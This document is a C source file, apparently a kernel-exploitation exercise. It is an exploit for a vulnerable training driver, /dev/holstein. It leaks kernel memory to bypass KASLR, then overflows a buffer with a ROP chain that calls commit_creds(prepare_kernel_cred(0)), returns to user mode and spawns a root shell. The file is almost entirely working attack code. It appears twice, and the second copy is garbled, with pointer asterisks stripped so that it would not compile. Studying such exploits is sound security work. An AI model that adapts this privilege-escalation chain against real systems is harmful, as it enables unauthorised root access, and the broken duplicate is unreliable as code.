brant-ruan/exploit_bypass_kaslr.c

## exploit_bypass_kaslr.c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>

char *VULN_DRV = "/dev/holstein";
void spawn_shell();

int64_t global_fd = 0;

uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t user_rip = (uint64_t) spawn_shell;
uint64_t prepare_kernel_cred = 0xffffffff8106e240;
uint64_t commit_creds = 0xffffffff8106e390;
uint64_t pop_rdi_ret = 0xffffffff812ef4c0; // will fail
// uint64_t pop_rdi_ret = 0xffffffff812bbdc; // works
uint64_t pop_rcx_ret = 0xffffffff812ea083; // will fail
// uint64_t pop_rcx_ret = 0xffffffff8132cdd3; // works
uint64_t mov_rdi_rax_xxx_ret = 0xffffffff8160c96b;
uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81800e10;
uint64_t kernel_base = 0xffffffff81000000;
uint64_t base_off = 0;


void open_dev() {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[!] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}


void leak_kernel_base() {
    printf("[*] trying to leak up to %ld bytes memory\n", 0x440);
    char buf[0x440];
    memset(buf, 0, 0x440);
    read(global_fd, buf, 0x440);
    uint64_t *leak = (uint64_t *)buf;
    base_off = leak[0x408/8] - 0xffffffff8113d33c;
    kernel_base = 0xffffffff81000000 + base_off;
    printf("[+] got kernel base address: 0x%lx\n", kernel_base);
    printf("[+] got kernel base address offset: 0x%lx\n", base_off);
}


void spawn_shell() {
    puts("[+] returned to user land");
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] got root (uid = %d)\n", uid);
    } else {
        printf("[!] failed to get root (uid: %d)\n", uid);
        exit(-1);
    }
    puts("[*] spawning shell");
    system("/bin/sh");
    exit(0);
}


void save_userland_state() {
    puts("[*] saving user land state");
    __asm__(".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax");
}


void overwrite_ret() {
    puts("[*] trying to overwrite return address of write op");
    char payload[0x500];
    memset(payload, 'A', 0x408);
    unsigned long *chain = (unsigned long*)&payload[0x408];
    *chain++ = pop_rdi_ret + base_off; // return address
    *chain++ = 0x0;
    *chain++ = prepare_kernel_cred + base_off;
    *chain++ = pop_rcx_ret + base_off;
    *chain++ = 0;
    *chain++ = mov_rdi_rax_xxx_ret + base_off;
    *chain++ = commit_creds + base_off;
    *chain++ = swapgs_restore_regs_and_return_to_usermode + 22 + base_off;
    *chain++ = 0x0;
    *chain++ = 0x0;
    *chain++ = user_rip;
    *chain++ = user_cs;
    *chain++ = user_rflags;
    *chain++ = user_sp;
    *chain++ = user_ss;

    uint64_t data = write(global_fd, payload, sizeof(payload));

    puts("[-] if you can read this we failed the mission :(");
}


int main(int argc, char **argv) {
    save_userland_state();
    open_dev();
    leak_kernel_base();
    overwrite_ret();
    close(global_fd);

    return 0;
}
	#include <fcntl.h>
	#include <stdint.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <string.h>
	#include <signal.h>

	char *VULN_DRV = "/dev/holstein";
	void spawn_shell();

	int64_t global_fd = 0;

	uint64_t user_cs, user_ss, user_rflags, user_sp;
	uint64_t user_rip = (uint64_t) spawn_shell;
	uint64_t prepare_kernel_cred = 0xffffffff8106e240;
	uint64_t commit_creds = 0xffffffff8106e390;
	uint64_t pop_rdi_ret = 0xffffffff812ef4c0; // will fail
	// uint64_t pop_rdi_ret = 0xffffffff812bbdc; // works
	uint64_t pop_rcx_ret = 0xffffffff812ea083; // will fail
	// uint64_t pop_rcx_ret = 0xffffffff8132cdd3; // works
	uint64_t mov_rdi_rax_xxx_ret = 0xffffffff8160c96b;
	uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81800e10;
	uint64_t kernel_base = 0xffffffff81000000;
	uint64_t base_off = 0;


	void open_dev() {
	global_fd = open(VULN_DRV, O_RDWR);
	if (global_fd < 0) {
	printf("[!] failed to open %s\n", VULN_DRV);
	exit(-1);
	} else {
	printf("[+] successfully opened %s\n", VULN_DRV);
	}
	}


	void leak_kernel_base() {
	printf("[*] trying to leak up to %ld bytes memory\n", 0x440);
	char buf[0x440];
	memset(buf, 0, 0x440);
	read(global_fd, buf, 0x440);
	uint64_t leak = (uint64_t )buf;
	base_off = leak[0x408/8] - 0xffffffff8113d33c;
	kernel_base = 0xffffffff81000000 + base_off;
	printf("[+] got kernel base address: 0x%lx\n", kernel_base);
	printf("[+] got kernel base address offset: 0x%lx\n", base_off);
	}


	void spawn_shell() {
	puts("[+] returned to user land");
	uid_t uid = getuid();
	if (uid == 0) {
	printf("[+] got root (uid = %d)\n", uid);
	} else {
	printf("[!] failed to get root (uid: %d)\n", uid);
	exit(-1);
	}
	puts("[*] spawning shell");
	system("/bin/sh");
	exit(0);
	}


	void save_userland_state() {
	puts("[*] saving user land state");
	__asm__(".intel_syntax noprefix;"
	"mov user_cs, cs;"
	"mov user_ss, ss;"
	"mov user_sp, rsp;"
	"pushf;"
	"pop user_rflags;"
	".att_syntax");
	}


	void overwrite_ret() {
	puts("[*] trying to overwrite return address of write op");
	char payload[0x500];
	memset(payload, 'A', 0x408);
	unsigned long chain = (unsigned long)&payload[0x408];
	*chain++ = pop_rdi_ret + base_off; // return address
	*chain++ = 0x0;
	*chain++ = prepare_kernel_cred + base_off;
	*chain++ = pop_rcx_ret + base_off;
	*chain++ = 0;
	*chain++ = mov_rdi_rax_xxx_ret + base_off;
	*chain++ = commit_creds + base_off;
	*chain++ = swapgs_restore_regs_and_return_to_usermode + 22 + base_off;
	*chain++ = 0x0;
	*chain++ = 0x0;
	*chain++ = user_rip;
	*chain++ = user_cs;
	*chain++ = user_rflags;
	*chain++ = user_sp;
	*chain++ = user_ss;

	uint64_t data = write(global_fd, payload, sizeof(payload));

	puts("[-] if you can read this we failed the mission :(");
	}


	int main(int argc, char **argv) {
	save_userland_state();
	open_dev();
	leak_kernel_base();
	overwrite_ret();
	close(global_fd);

	return 0;
	}